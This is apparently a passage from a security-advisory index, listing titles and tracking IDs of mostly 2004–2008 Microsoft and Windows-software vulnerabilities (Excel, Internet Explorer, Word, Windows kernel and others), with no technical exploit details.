Excel Input Validation Bug in Processing Conditional Formatting Values Lets Remote Users Execute Arbitrary Code [1019586] Microsoft Excel Input Validation Bug in Processing Rich Text Data Lets Remote Users Execute Arbitrary Code [1019585] Microsoft Excel Formula Parsing Error Lets Remote Users Execute Arbitrary Code [1019584] Microsoft Excel Input Validation Bug in Processing Style Record Data Lets Remote Users Execute Arbitrary Code [1019583] Microsoft Excel Flaw in Importing '.slk' Files Lets Remote Users Execute Arbitrary Code [1019582] Microsoft Excel Input Validation Bug in Processing Data Validation Records Lets Remote Users Execute Arbitrary Code [1019581] Microsoft Office Web Components DataSource Bug Lets Remote Users Execute Arbitrary Code [1019580] Microsoft Office Web Components URL Parsing Bug Lets Remote Users Execute Arbitrary Code [1019579] Microsoft Outlook 'mailto:' URL Validation Flaw Lets Remote Users Execute Arbitrary Code [1019578] Microsoft Office and Excel Memory Corruption Bugs Let Remote Users Execute Arbitrary Code [1019525] Symantec Backup Exec for Windows Server ActiveX Control Unsafe Methods Let Remote Users Execute Arbitrary Code [1019524] Symantec Backup Exec for Windows Server ActiveX Control Buffer Overflow Lets Remote Users Execute Arbitrary Code [1019388] Microsoft Works/Microsoft Office Bug in Processing '.wps' Field Length Values Lets Remote Users Execute Arbitrary Code [1019387] Microsoft Works/Microsoft Office Bug in Processing '.wps' Header Index Table Lets Remote Users Execute Arbitrary Code [1019386] Microsoft Works/Microsoft Office Bug in Processing '.wps' File Section Length Headers Lets Remote Users Execute Arbitrary Code [1019385] Microsoft Internet Information Services Error in Processing ASP Page Input Lets Remote Users Execute Arbitrary Code [1019384] Microsoft Internet Information Services File Change Notification Bug Lets Local Users Gain Elevated Privileges [1019383] Windows Vista TCP/IP Stack DHCP Response Processing Bug Lets Remote Users Deny Service [1019381] Microsoft Internet Explorer Argument Validation Flaw in 'dxtmsft.dll' Lets Remote Users Execute Arbitrary Code [1019380] Microsoft Internet Explorer Property Method Processing Bug Lets Remote Users Execute Arbitrary Code [1019379] Microsoft Internet Explorer HTML Layout Rendering Bug Lets Remote Users Execute Arbitrary Code [1019378] Microsoft Internet Explorer Buffer Overflow in Fox Pro ActiveX Control Lets Remote Users Execute Arbitrary Code [1019377] Microsoft Office Publisher Memory Corruption Bug Lets Remote Users Execute Arbitrary Code [1019376] Microsoft Office Publisher Invalid Memory Reference Bug Lets Remote Users Execute Arbitrary Code [1019375] Microsoft Office Object Processing Flaw Lets Remote Users Execute Arbitrary Code [1019374] Microsoft Word Memory Error Lets Remote Users Execute Arbitrary Code [1019373] Windows Heap Overflow in Object Linking and Embedding (OLE) Automation Lets Remote Users Execute Arbitrary Code [1019372] Windows WebDAV Mini-Redirector Response Handling Bug Lets Remote Users Execute Arbitrary Code [1019258] Microsoft Visual Basic '.dsr' File Buffer Overflow Lets Remote Users Execute Arbitrary Code [1019200] Microsoft Excel File Header Bug Lets Remote Users Execute Arbitrary Code [1019166] Windows TCP/IP Stack ICMP and IGMP Bugs Let Remote Users Deny Service and Execute Arbitrary Code [1019078] Microsoft Internet Explorer Object Access Bugs Let Remote Users Execute Arbitrary Code [1019077] Microsoft Message Queuing (MSMQ) Buffer Overflow Lets Remote Users Execute Arbitrary Code [1019075] Windows Vista Kernel ALPC Validation Flaw Lets Local Users Gain Elevated Privileges [1019074] Windows Media Format Runtime ASF File Parsing Bug Lets Remote Users Execute Arbitrary Code [1019073] Microsoft DirectX Bugs in Parsing SAMI, WAV, and AVI Files Let Remote Users Execute Arbitrary Code [1019072] Windows Vista Server Message Block v2 Signature Flaw Lets Remote Users Execute Arbitrary Code [1019064] Windows Media Player Stack Overflow in 3ivx Codec Lets Remote Users Execute Arbitrary Code [1019046] Cisco Security Agent for Windows Buffer Overflow Lets Remote Users Execute Arbitrary Code [1019033] Microsoft Web Proxy Auto-Discovery Name Server Resolution Bug Lets Remote Users Conduct Man-in-the-Middle Attacks [1019001] Symantec Backup Exec for Windows Servers Lets Remote Users Deny Service [1018976] Microsoft Jet Engine Stack Overflow May Let Remote Users Execute Arbitrary Code [1018903] Microsoft DebugView 'Dbgv.sys' Module Lets Local Users Gain Kernel Level Privileges [1018833] Windows Macromedia Security Driver Buffer Overflow Lets Local Users Gain Elevated Privileges [1018832] Windows Mobile SMS Handler Bug Lets Remote Users Obfuscate SMS Message Source Addresses [1018790] Microsoft Word Bug in Processing Office Files Lets Remote Users Execute Arbitrary Code [1018789] Microsoft SharePoint Input Validation Hole Permits Cross-Site Scripting Attacks [1018788] Microsoft Internet Explorer Bugs Let Remote Users Spoof the Address Bar and Execute Arbitrary Code [1018787] Windows RPC NTLMSSP Authentication Flaw Lets Remote Users Deny Service [1018786] Microsoft Outlook Express Bug in Processing NNTP Responses Lets Remote Users Execute Arbitrary Code [1018785] Windows Mail Bug in Parsing NNTP Responses Lets Remote Users Execute Arbitrary Code [1018727] Microsoft Internet Security and Acceleration Server SOCKS4 Proxy Discloses IP Address Information to Remote Users [1018678] Windows Services for UNIX Lets Local Users Gain Elevated Privileges [1018677] Microsoft Agent ActiveX Control Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1018676] Microsoft Visual Basic VBP File Buffer Overflow Lets Remote Users Execute Arbitrary Code [1018617] Subversion Windows Client Input Validation Flaw in filename Parameter Lets Remote Authenticated Users Create/Overwrite Files [1018575] Safari for Windows Lets Remote Users Upload Arbitrary File [1018568] Microsoft Vector Markup Language Buffer Overflow Lets Remote Users Execute Arbitrary Code [1018567] Microsoft Virtual PC/Server Heap Overflow Lets Local Users Gain Elevated Privileges [1018566] Windows Bugs in the Contacts, Feed Headlines, and Weather Gadgets Let Remote Users Execute Arbitrary Code [1018565] Windows Media Player Skin File Header Processing Bugs Let Remote Users Execute Arbitrary Code [1018563] Microsoft GDI Buffer Overflow Lets Remote Users Execute Arbitrary Code [1018562] Microsoft Internet Explorer CSS and ActiveX Control Bugs Let Remote Users Execute Arbitrary Code [1018561] Microsoft Excel Workspace Index Validation Bug Lets Remote Users Execute Arbitrary Code [1018560] Microsoft OLE Automation Memory Corruption Bug Lets Remote Users Execute Arbitrary Code [1018559] Microsoft Core XML Services Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1018551] Microsoft DirectX Buffer Overflow in FlashPix ActiveX Control Lets Remote Users Execute Arbitrary Code [1018520] Microsoft Visual Database Tools Buffer Overflow in ActiveX Control Lets Remote Users Execute Arbitrary Code [1018420] Microsoft DirectX Heap Overflow in Processing RLE-Compressed Targa Images Lets Remote Users Execute Arbitrary Code [1018412] Mozilla Firefox Lets Remote Users Inject Arbitrary Content into 'about:blank' Windows [1018366] Symantec Backup Exec for Windows RPC Bug Lets Remote Users Deny Service [1018355] Windows Active Directory Bug in Processing LDAP Convertible Attributes Lets Remote Users Execute Arbitrary Code [1018354] Windows Vista Firewall Teredo Interface Discloses Network Information to Remote Users and May Let Remote Users Bypass Firewall Rules [1018353] Microsoft Office Publisher Lets Remote Users Execute Arbitrary Code [1018352] Microsoft Excel Caculation Error and Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1018351] Microsoft Internet Explorer Bug in Firefox URL Protocol Handler Lets Remote Users Execute Arbitrary Commands [1018321] Microsoft Excel Sheet Name Buffer Overflow Lets Remote Users Execute Arbitrary Code [1018318] Nessus Input Validation Hole in Windows GUI Permits Cross-Site Scripting Attacks [1018251] Microsoft Office Buffer Overflow in MSODataSourceControl ActiveX Control May Let Remote Users Execute Arbitrary Code [1018235] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code [1018234] Windows Mail MHTML Protocol Handler Content-Disposition Bug Lets Remote Users Obtain Information [1018232] Windows Mail MHTML Protocol Handler Redirect Bug Lets Remote Users Obtain Information [1018230] Windows Input Validation Flaw in Win32 API Lets Remote and Local Users Execute Arbitrary Code [1018226] Windows Schannel Digital Signature Bug Lets Remote Users Execute Arbitrary Code [1018225] Windows Vista Discloses Sensitive Information to Local Users [1018202] Microsoft GDI+ ICO File Divide By Zero Bug Lets Remote Users Deny Service [1018193] Microsoft Internet Explorer Lets Remote Users Spoof Certain Objects [1018192] Microsoft Internet Explorer Input Validation Hole Permits Cross-Site Scripting Attacks [1018188] Symantec VERITAS Storage Foundation Windows Scheduler Service Lets Remote Users Execute Arbitrary Commands [1018107] Microsoft Office Buffer Overflow in OUACTRL.OCX ActiveX Control Lets Remote Users Execute Arbitrary Code [1018019] Microsoft Internet Explorer Bugs Let Remote Users Modify Files or Execute Arbitrary Code [1018017] Microsoft CAPICOM 'CAPICOM.Certificates' ActiveX Control Lets Remote Users Execute Arbitrary Code [1018016] Microsoft BizTalk Server 'CAPICOM.Certificates' ActiveX Control Lets Remote Users Execute Arbitrary Code [1018015] Microsoft Exchange Base64, iCal, IMAP, and Attachment Processing Bugs Let Remote Users Deny Service or Execute Arbitrary Code [1018014] Microsoft Office Drawing Object Validation Flaw Lets Remote Users Execute Arbitrary Code [1018013] Microsoft Word Array and RTF Processing Bugs Let Remote Users Execute Arbitrary Code [1018012] Microsoft Excel Specially Crafted BIFF Records, Set Font Values, and Filter Records Permit Remote Code Execution [1017969] Microsoft Internet Explorer Digest Authentication Bug Lets Remote Users Conduct HTTP Request Splitting Attacks [1017902] Microsoft Word Lets Remote Users Cause Arbitrary Code to Be Executed [1017898] Windows Kernel Memory Mapping Permission Error Lets Local Users Gain System Privileges [1017897] Windows Vista Client-Server Run-time Subsystem Lets Local Users Gain Elevated Privileges [1017896] Microsoft Agent URL Parsing Bug Lets Remote Users Execute Arbitrary Code [1017895] Windows XP Universal Plug and Play Lets Remote Users on the Local Subnet Execute Arbitrary Code [1017894] Microsoft Content Management Server Permits Cross-Site Scripting Attacks and Lets Remote Users Execute Arbitrary Code [1017847] Windows Kernel GDI Color Parameter Bug Lets Local Users Gain System Privileges [1017846] Windows Kernel GDI Input Validation Flaw in Processing Application Size Parameters Lets Local Users Gain System Privileges [1017845] Windows TrueType Font Rasterizer Lets Local Users Gain System Privileges [1017844] Windows Kernel EMF Image Processing Bug Lets Local Users Gain System Privileges [1017843] Windows Kernel WMF Image Processing Lets Remote Users Deny Service [1017816] Windows Mail URL Bug Lets Remote Users Cause Execute Existing Code on the Target User's System to Be Executed [1017712] Citrix Presentation Server Client for Windows Lets Remote Users Execute Arbitrary Code [1017694] VeriSign Secure Messaging for Microsoft Exchange Stack Overflow in ConfigChk ActiveX Control Lets Remote Users Execute Arbitrary Code [1017653] Microsoft Word Unspecified Vulnerability Lets Remote Users Execute Arbitrary Code [1017643] Microsoft Internet Explorer Multiple COM Objects Let Remote Users Execute Arbitrary Code [1017642] Microsoft Internet Explorer FTP Server Response Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1017640] Microsoft Office OLE Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1017639] Microsoft Word Macro Security Warning Bug and Drawing Object Memory Corrupution Error Lets Remote Users Execute Arbitrary Code [1017638] Microsoft MFC Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1017637] Microsoft OLE Dialog RTF File Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1017635] Microsoft HTML Help ActiveX Control Lets Remote Users Execute Arbitrary Code [1017634] Windows Image Acquisition Service Buffer Overflow Lets Local Users Gain System Privileges [1017633] Windows Shell Hardware Detection Service Parameter Validation Error Lets Local Users Gain Elevated Privileges [1017632] Microsoft Step-by-Step Interactive Training Buffer Overflow in Processing Bookmark Links Lets Remote Users Execute Arbitrary Code [1017609] HP OpenView Network Node Manager Unsafe Folder Permissions Lets Local Windows Users Gain Elevated Privileges [1017584] Microsoft Office Excel Buffer Overflow Lets Remote Users Execute Arbitrary Code [1017579] [Duplicate Entry] Microsoft Word Unspecified Vulnerability Lets Remote Users Execute Arbitrary Code [1017564] Microsoft Word Function Processing Bug Lets Remote Users Execute Arbitrary Code [1017530] Microsoft Help Workshop Buffer Overflow in Processing '.CNT' Files Lets Remote Users Execute Arbitrary Code [1017489] Windows Vector Markup Language Buffer Overflow Lets Remote Users Execute Arbitrary Code [1017488] Microsoft Outlook '.iCal', '.oss', and SMTP Header Bugs Let Remote Users Execute Arbitrary Code or Deny Service [1017487] Microsoft Excel Buffer Overflows in Processing Various Records and Strings Lets Remote Users Execute Arbitrary Code [1017486] Microsoft Office Brazilian Portuguese Grammar Checker Lets Remote Users Execute Arbitrary Code [1017485] Microsoft Excel Memory Access Error Lets Remote Users Execute Arbitrary Code [1017454] Windows Client-Server Run-time Subsystem NtRaiseHardError Discloses Memory to Local Users [1017433] Windows Client-Server Run-time Subsystem Lets Remote Users Execute Arbitrary Code [1017401] Mozilla Firefox Windows Cursor Image Conversion Heap Overflow Lets Remote Users Execute Arbitrary Code [1017400] Mozilla Thunderbird Windows Cursor Image Conversion Heap Overflow Lets Remote Users Execute Arbitrary Code [1017399] Mozilla Seamonkey Windows Cursor Image Conversion Heap Overflow Lets Remote Users Execute Arbitrary Code [1017397] Microsoft Outlook Recipient ActiveX Control Lets Remote Users Deny Service [1017390] Microsoft Word Unchecked Count Vulnerability Lets Remote Users Execute Arbitrary Code [1017388] Microsoft Project Discloses Database Password to Remote Authenticated Users [1017374] Microsoft Internet Explorer May Disclose Contents of the Temporary Internet Files Folder to Remote Users [1017373] Microsoft Internet Explorer DHTML and Script Error Handling Bugs Let Remote Users Execute Arbitrary Code [1017372] Windows Media Player and Windows Media Format Runtime ASF File Buffer Overflow Lets Remote Users Execute Arbitrary Code [1017371] Windows SNMP Service Buffer Overflow Lets Remote Users Execute Arbitrary Code [1017370] Windows Client-Server Run-time Subsystem Lets Local Users Gain System Privileges [1017368] Windows Remote Installation Service TFTP Server Lets Remote Users Overwrite Files to Execute Arbitrary Code [1017358] Microsoft Word Data Structure Processing Bug Lets Remote Users Cause Arbitrary Code to Be Executed [1017354] Windows Media Player ASX Playlist File Buffer Overflow May Let Remote Users Execute Arbitrary Code [1017339] Microsoft Word String Processing Bug Lets Remote Users Execute Arbitrary Code [1017330] Windows Print Spooler Subsystem GetPrinterData() Function Lets Remote Users Deny Service [1017224] Microsoft Client Service for Netware Buffer Overflows Let Remote Users Execute Arbitrary Code and Crash the System [1017223] Microsoft Internet Explorer Bug in Rending HTML Layout Combinations May Let Remote Users Execute Arbitrary Code [1017222] Microsoft Agent '.ACF' File Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1017221] Windows Workstation Service Buffer Overflow Lets Remote Users Execute Arbitrary Code [1017165] Microsoft Internet Explorer 'ieframe.dll' Lets Remote Users Spoof Invalid Certificates [1017157] Microsoft XML Core Services ActiveX Control Lets Remote Users Execute Arbitrary Code [1017142] Microsoft Visual Studio WMI Object Broker ActiveX Control Lets Remote Users Execute Arbitrary Code [1017133] Microsoft NAT Helper 'ipnathlp.dll' Lets Remote Users Deny Service [1017127] Microsoft Data Access Components 'ADODB.Connection' Execute Function Lets Remote Users Execute Arbitrary Code [1017122] Microsoft Internet Explorer Lets Remote Users Partially Spoof Address Bar URLs [1017059] Microsoft PowerPoint Bug Causes PowerPoint to Crash [1017037] Windows Object Packager RTF File Object Lets Remote Users Execute Arbitrary Code [1017035] Windows Server Service SMB Rename Null Pointer Dereference Lets Remote Users Deny Service [1017034] Microsoft Office String, Chart Record, and SmartTag Validation Errors Let Remote Users Execute Arbitrary Code [1017033] Microsoft XML Core Services Lets Remote Users Execute Arbitrary Code or Obtain Information [1017032] Microsoft Word String and Mail Merge Record Validation Flaws Let Remote Users Execute Arbitrary Code [1017031] Microsoft Excel DATETIME/COLINFO Record Errors and Lotus 1-2-3 Errors Let Remote Users Execute Arbitrary Code [1017030] Microsoft PowerPoint Errors in Parsing Object Pointers and Data Records Lets Remote Users Execute Arbitrary Code [1017018] Cisco Secure Desktop May Let Local Users Access Data Via Windows Operating System Files [1016937] Microsoft PowerPoint Memory Corruption Bug Lets Remote Users Execute Arbitrary Code [1016886] [Duplicate] Microsoft PowerPoint Bug Lets Remote Users Execute Arbitrary Code [1016879] Microsoft Internet Explorer VML Buffer Overflow Lets Remote Users Execute Arbitrary Code [1016854] Microsoft Internet Explorer Buffer Overflow in 'daxctle.ocx' ActiveX in KeyFrame Method Control Lets Remote Users Execute Arbitrary Code [1016839] Microsoft Internet Explorer URLMON.DLL Buffer Overflow Lets Remote Users Execute Arbitrary Code [1016827] Microsoft PGM Implementation Buffer Overflow in MSMQ Service Lets Remote Users Execute Arbitrary Code [1016826] Windows Indexing Service Input Validation Flaw in Query Parameters Permits Cross-Site Scripting Attacks [1016825] Microsoft Publisher Buffer Overflow in Parsing '.pub' Files Lets Remote Users Execute Arbitrary Code [1016787] Microsoft Word Record Validation Vulnerability Lets Remote Users Execute Arbitrary Code [1016764] Microsoft Internet Explorer (IE) Buffer Overflow in 'daxctle.ocx' ActiveX Control Lets Remote Users Execute Arbitrary Code [1016731] Microsoft Internet Explorer URL Buffer Overflow in Processing HTTP 1.1 Protocol with Compression Lets Remote Users Execute Arbitrary Code [1016720] [Duplicate Entry] Microsoft PowerPoint Unknown Bug May Let Remote Users Execute Arbitrary Code [1016667] Windows Server Service Buffer Overflow Lets Remote Users Execute Arbitrary Code [1016663] Microsoft Internet Explorer Bugs Let Remote Users Obtain Information or Execute Arbitrary Code [1016662] Windows 2000 Kernel Winlogon Alternate Path Lets Local Users Gain Elevated Privileges. [1016661] Windows Kernel Incorrect Exception Handling Lets Remote Users Execute Arbitrary Code [1016659] Windows Hyperlink Object Library Buffer Overflow Lets Remote Users Execute Arbitrary Code [1016658] Windows 2000 Kernel Buffer Overflow Lets Local Users Gain Elevated Privileges [1016657] Microsoft Office Buffer Overflow in Processing PowerPoint Records Lets Remote Users Execute Arbitrary Code [1016656] Microsoft Visual Basic for Applications Buffer Overflow Lets Remote Users Execute Arbitrary Code [1016655] Microsoft Management Console Input Validation Hole Permits Remote Code Execution [1016654] Microsoft Outlook Express MHTML Parsing Error Lets Remote Users Execute Arbitrary Code [1016653] Windows Winsock and DNS Client Buffer Overflows Let Remote Users Execute Arbitrary Code [1016606] Windows Server Service Null Pointer Comparison Lets Remote Users Deny Service [1016506] Microsoft Internet Security and Acceleration Server HTTP File Exentsion Filter Can Be Bypassed By Remote Users [1016504] Microsoft Works Buffer Overflow in Processing Spreadsheet Files May Let Remote Users Execute Arbitrary Code [1016496] Microsoft PowerPoint 'mso.dll' Buffer Overflow May Let Remote Users Execute Arbitrary Code [1016472] Microsoft Excel Errors in Processing Various Malformed Records Let Remote Users Execute Arbitrary Code [1016470] Microsoft Office PNG and GIF File Buffer Error Lets Remote Users Execute Arbitrary Code [1016469] Microsoft Office String Parsing and Property Bugs Let Remote Users Execute Arbitrary Code [1016468] Microsoft DHCP Client Buffer Overflow Lets Remote Users Execute Arbitrary Code [1016467] Windows Server Service Buffer Overflows Let Remote Users View SMB Information and Execute Arbitrary Code [1016466] Microsoft Internet Information Server (IIS) Buffer Overflow in Processing ASP Pages Lets Remote Authenticated Users Execute Arbitrary Code [1016453] Microsoft Office LsCreateLine() Function May Let Remote Users Execute Arbitrary Code [1016434] Microsoft HTML Help Heap Overflow in HHCtrl ActiveX Control May Let Remote Users Execute Arbitrary Code [1016430] Microsoft Excel STYLE Record Bug May Let Remote Users Execute Arbitrary Code [1016375] Webmin for Windows Error in Parsing '\' Backslash Character Permits Directory Traversal Attacks [1016373] Windows Live Messenger Contact List Heap Overflow [1016344] Microsoft Excel 'Shockwave Flash Object' Lets Remote Users Execute Code Automatically [1016316] Microsoft Excel Memory Validation Flaw May Let Remote Users Cause Arbitrary Code to Be Executed [1016291] Microsoft Internet Explorer Multiple Memory and Access Control Errors Let Remote Users Execute Arbitrary Code [1016289] Microsoft RPC Mutual Authentication Bug Lets Remote Users Spoof Other Systems [1016288] Windows Server Message Block Processing Bugs Let Local Users Gain Elevated Privileges or Deny Service [1016287] Microsoft PowerPoint Buffer Overflow in Processing Malformed Records Lets Remote Users Execute Arbitrary Code [1016285] Windows Routing and Remote Access Service RPC Buffer Overflows Let Remote Users Execute Arbitrary Code [1016284] Windows Media Player Buffer Overflow in Rendering PNG Images Lets Remote Users Execute Arbitrary Code [1016283] Microsoft JScript Memory Corruption Bug Lets Remote Users Execute Arbitrary Code [1016280] Microsoft Outlook Web Access Input Validation Hole Permits Cross-Site Scripting Attacks [1016196] F-Secure Anti-Virus for Microsoft Exchange Buffer Overflow in Web Console May Let Remote Users Execute Arbitrary Code [1016156] Cisco VPN Client for Windows Lets Local Users Gain Elevated Privileges [1016130] Microsoft Word Lets Remote Users Cause Arbitrary Code to Be Executed [1016048] Microsoft Exchange Error in Processing iCAL/vCAL Properties Lets Remote Users Execute Arbitrary Code [1016047] Microsoft Distributed Transaction Coordinator Bugs Let Remote Users Deny Service [1016005] Microsoft Outlook Express 'mhtml:' Redirect URL Processing Lets Remote Users Bypass Security Domains [1016001] Microsoft Internet Explorer Bug in Processing Nested OBJECT Tags Lets Remote Users Execute Arbitrary Code [1015969] HP StorageWorks Secure Path for Windows Lets Remote Users Deny Service [1015950] Neon Responders for Windows Can Be Crashed By Remote Users [1015900] Microsoft Internet Explorer Parsing and State Errors Let Remote Users Execute Arbitrary Code [1015899] Microsoft Internet Explorer Lets Remote Users Spoof the Address Bar URL [1015896] Microsoft FrontPage Server Extensions Input Validation Holes Permit Cross-Site Scripting Attacks [1015895] Microsoft SharePoint Team Services Input Validation Holes Permit Cross-Site Scripting Attacks [1015894] Microsoft Data Access Components RDS.Dataspace Access Control Bug Lets Remote Users Execute Arbitrary Code [1015892] Microsoft Internet Explorer Popup Window Object Bugs Let Remote Users Execute Scripting Code in Arbitrary Domains [1015855] Microsoft Office Array Index Boundary Error Lets Remote Users Execute Arbitrary Code [1015825] Microsoft ASP.NET Incorrect COM Component Reference Lets Remote Users Deny Service [1015812] Microsoft Internet Explorer createTextRange() Memory Error Lets Remote Users Execute Arbitrary Code [1015800] (Vendor Issues Fix) Microsoft Internet Explorer (IE) Lets Remote Users Cause HTA Files to Be Executed [1015794] (Vendor Issues Fix) Microsoft Internet Explorer 'mshtml.dll' Bug in Processing Multiple Action Handlers Lets Remote Users Deny Service [1015785] Veritas Backup Exec for Windows Servers Media Server Format String Bug in BENGINE May Let Remote Users Execute Arbitrary Code [1015766] Microsoft Office and Excel Buffer Overflows Let Remote Users Execute Arbitrary Code [1015720] Microsoft Internet Explorer Modal Security Dialog Race Condition May Let Remote Users Install Code or Obtain Information [1015632] Microsoft PowerPoint May Let Users Access Contents of the Temporary Internet Files Folder [1015631] Microsoft Office Korean Input Method Editor Lets Local Users Gain Elevated Privileges [1015628] Windows Media Player Plug-in for 3rd Party Browsers Buffer Overflow in Processing EMBED Elements Lets Remote Users Execute Arbitrary Code [1015627] Windows Media Player Bitmap File Bug May Let Remote Users Execute Arbitrary Code [1015585] Microsoft HTML Help Workshop Buffer Overflow in Processing .hhp Files Lets Remote User Execute Arbitrary Code [1015559] Microsoft Internet Explorer Shockwave Flash Scripting Bug Lets Remote Users Deny Service [1015489] Microsoft Wireless Network Connection Software May Broadcast Ad-Hoc SSID Information in Certain Cases [1015461] Microsoft Outlook Buffer Overflow in Processing TNEF Messages Lets Remote Users Execute Arbitrary Code [1015460] Microsoft Exchange Buffer Overflow in Processing TNEF Messages Lets Remote Users Execute Arbitrary Code [1015376] Microsoft IIS Lets Remote Users Deny Service or Execute Arbitrary Code With Malformed HTTP GET Requests [1015350] Microsoft Internet Explorer Bug in Using HTTPS Proxies May Disclose Web URLs to Remote Users [1015348] Microsoft Internet Explorer Bug in Instantiating COM Objects May Let Remote Users Execute Arbitrary Code [1015333] Microsoft Excel Unspecified Stack Overflow May Let Remote Users Cause Arbitrary Code to Be Executed [1015251] Microsoft Internet Explorer Bug in Processing Mismatched Document Object Model Objects May Let Remote Users Execute Arbitrary Code [1015226] Microsoft AntiSpyware Improper CreateProcess() Call Lets Local Users Execute Arbitrary Code [1015224] Kaspersky Anti-Virus for Windows File Servers Improper CreateProcess() Call Lets Local Users Execute Arbitrary Code [1015222] Apple iTunes for Windows Improper CreateProcess() Call Lets Local Users Execute Arbitrary Code [1015143] F-Secure Anti-Virus for Microsoft Exchange Web Console May Disclose Files to Remote Users [1015101] Microsoft Internet Explorer J2SE Runtime Environment Bug Lets Remote Users Crash the Target User's Browser [1015043] Microsoft Network Connection Manager Lets Remote Users Deny Service [1015041] Microsoft Client Service for NetWare Buffer Overflow Lets Remote Users Execute Arbitrary Code [1015038] Microsoft Exchange Buffer Overflow in Collaboration Data Objects Lets Remote Users Execute Arbitrary Code [1015034] Microsoft DirectX DirectShow Buffer Overflow Lets Remote Users Execute Arbitrary Code [1014899] AVIRA Desktop for Windows Buffer Overflow in Processing ACE Archives May Let Remote Users Execute Arbitrary Code [1014871] NOD32 for Windows Buffer Overflow in Processing ARJ Archives May Let Remote Users Execute Arbitrary Code [1014809] Microsoft Internet Explorer Unspecified Bug May Permit Remote Code Execution [1014777] Microsoft IIS ASP Error Page May Disclose System Information in Certain Cases [1014727] Microsoft 'msdds.dll' COM Object Lets Remote Users Execute Arbitrary Code [1014643] Microsoft Internet Explorer COM Object Instantiation Bug May Let Remote Users Execute Arbitrary Code [1014641] Microsoft Internet Explorer Web Folder URL Validation Bug Lets Remote Users Execute Scripting Code in an Arbitrary Security Domain [1014566] Windows Buffer Overflow in Unspecified USB Device Driver Lets Physically Local Users Execute Arbitrary Code [1014500] Microsoft Internet Explorer (IE) JPEG Rendering Bugs Let Remote Users Deny Service or Execute Arbitrary Code [1014458] Microsoft Office Buffer Overflow in Parsing Fonts Lets Remote Users Cause Arbitrary Code to Be Executed [1014457] Microsoft Microsoft Color Management Module Lets Remote Users Execute Arbitrary Code [1014364] Microsoft Internet Information Server May Allow Remote Users to Conduct HTTP Response Smuggling Attacks [1014356] Microsoft ISA Server May Accept HTTP Authentication Even When SSL Is Required [1014352] Microsoft Front Page May Crash When Editing a Specially Crafted Web Page [1014329] Microsoft Internet Explorer 'javaprxy.dll' COM Object Exception Handling Lets Remote Users Execute Arbitrary Code [1014261] Microsoft Internet Explorer Lets Remote Users Spoof Javascript Dialog Boxes [1014201] Microsoft Internet Explorer Buffer Overflow in Rendering PNG Images Lets Remote Users Execute Arbitrary Code [1014200] Microsoft Outlook Express Buffer Overflow in NNTP Response Parser Lets Remote Users Execute Arbitrary Code [1014199] Microsoft Outlook Web Access Input Validation Hole in IMG Tags Permits Cross-Site Scripting Attacks [1014197] Microsoft Agent Lets Remote Users Spoof Security Dialog Box Contents [1014195] Microsoft HTML Help Input Validation Flaw Lets Remote Users Execute Arbitrary Code [1014194] Microsoft Step-by-Step Interactive Training Bookmark Link File Validation Flaw Lets Remote Users Execute Arbitrary Code [1014193] Microsoft Internet Security and Acceleration Server Bugs Let Remote Users Poison the Cache and Establish NetBIOS Connections [1014178] Symantec pcAnywhere 'Launch With Windows' Properties Let Local Users Gain Elevated Privileges [1014174] Microsoft Internet Explorer Lets Remote Users Obfuscate Scripting Code [1014131] SMTP Server for Windows NT/2000/XP/2003 Lets Remote Users Crash the SMTP Service [1014113] Microsoft ISA Server in SecureNAT Configuration Can Be Crashed By Remote Users [1014050] Computer Associates eTrust Antivirus Integer Overflow in Processing Microsoft OLE Data Lets Remote Users Execute Arbitrary Code [1013996] Microsoft ASP.NET May Disclose System Information to Remote Users in Certain Cases [1013945] Windows Media Player License Acquisition Feature May Let Remote Users Redirect Users to Arbitrary Web Pages [1013692] Microsoft Internet Explorer Buffer Overflows in DHTML, URL Parsing, and Content Advisor Let Remote Users Execute Arbitrary Code [1013691] Microsoft Message Queuing Buffer Overflow Lets Remote Users Execute Arbitrary Code [1013687] Microsoft Exchange Heap Overlow in Processing Extended SMTP Verb Lets Remote Users Execute Arbitrary Code [1013684] Microsoft Word Unspecified Buffer Overflow in Processing Documents Lets Remote Users Execute Arbitrary Code [1013669] Microsoft Outlook Web Access 'From' Address Display Lets Remote Users Spoof Origination Addresses [1013668] Microsoft Outlook 'From' Address Display Lets Remote Users Spoof Origination Addresses [1013618] Microsoft Jet Database Buffer Overflow in 'msjet40.dll' Lets Remote Users Execute Arbitrary Code [1013583] Microsoft Outlook Connector for IBM Lotus Domino Lets Users Bypass Password Storage Policy [1013454] Microsoft Office InfoPath 2003 May Disclose System and Authentication Information to Remote Users [1013436] GoodTech Telnet Server for Windows NT/2000/XP/2003 Buffer Overflow in Administration Port Lets Remote Users Execute Arbitrary Code [1013205] Microsoft Internet Explorer Can Be Crashed With URL Containing Special URL Characters [1013126] Microsoft Internet Explorer CDF Scripting Error Lets Remote Users Execute Scripting Code in Arbitrary Domains [1013125] Microsoft Internet Explorer DHTML Method Heap Overflow Lets Remote Users Execute Arbitrary Code [1013124] Microsoft Internet Explorer URL Encoding Error Lets Remote Users Spoof Arbitrary URLs and Execute Scripting Code in Arbitrary Security Zone [1013111] Microsoft SharePoint Services Redirection Query Input Validation Hole Lets Remote Users Conduct Cross-Site Scripting Attacks [1013110] Microsoft Office XP Buffer Overflow in Processing URLs Lets Remote Users Execute Arbitrary Code [1013108] Mozilla Firefox Hybrid Image Bug Allows Batch Statements to Be Draged to the Desktop and Tabbed Javascript Bugs Let Remote Users Access Other Windows [1013086] Microsoft Outlook Web Access 'owalogon.asp' Lets Remote Users Redirect Login Requests [1012836] Microsoft HTML Help Active Control Cross-Domain Error Lets Remote Users Execute Arbitrary Commands [1012835] Microsoft Cursor and Icon Validation Error Lets Remote Users Execute Arbitrary Code [1012833] Windows Indexing Service Buffer Overflow in Processing Queries Lets Remote Users Execute Arbitrary Code [1012706] netcat for Windows Buffer Overflow in doexec Lets Remote Users Execute Arbitrary Code [1012652] Spy Sweeper Enterprise Windows Tray Icon Lets Local Users Gain Elevated Privileges [1012584] Microsoft IE dhtmled.ocx Lets Remote Users Execute Cross-Domain Scripting Attacks [1012518] Microsoft HyperTerminal Buffer Overflow Lets Remote Users Execute Arbitrary Code [1012517] Microsoft 